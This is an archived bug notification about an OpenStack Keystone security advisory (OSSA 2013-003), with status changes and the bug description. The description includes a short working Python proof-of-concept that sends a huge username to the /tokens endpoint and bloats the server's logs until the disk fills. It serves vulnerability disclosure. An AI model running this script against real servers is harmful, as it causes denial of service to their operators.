yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #02490
[Bug 1098307] Re: [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs
** Summary changed:
- unauthenticated POST to /tokens can fill up disk/logs
+ [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs
** Also affects: ossa
Importance: Undecided
Status: New
** Changed in: ossa
Status: New => Fix Released
** Changed in: ossa
Assignee: (unassigned) => Thierry Carrez (ttx)
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1098307
Title:
[OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs
Status in OpenStack Identity (Keystone):
Fix Released
Status in Keystone essex series:
Fix Committed
Status in Keystone folsom series:
Fix Released
Status in OpenStack Security Advisories:
Fix Released
Bug description:
A remote unauthenticated keystone user could potentially fill up the
disk on a Keystone server by running the following python script:
-----------------------
from keystoneclient.v2_0 import client
PASSWORD='foobar'
TENANT='blah'
USER = '00000' * 9999999
keystone = client.Client(username=USER,
password=PASSWORD,
tenant_name=TENANT,
auth_url='http://localhost:5000/v2.0')
-----------
Running this script will increase the log file size by 100 MB per
request. NOTE: This happens when running keystone at the default log
levels:
# verbose = False
# debug = False
Version-Release number of selected component (if applicable):
openstack-keystone-2012.2.1-1.el6ost.noarch (Red Hat)
How reproducible:
*always*
To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1098307/+subscriptions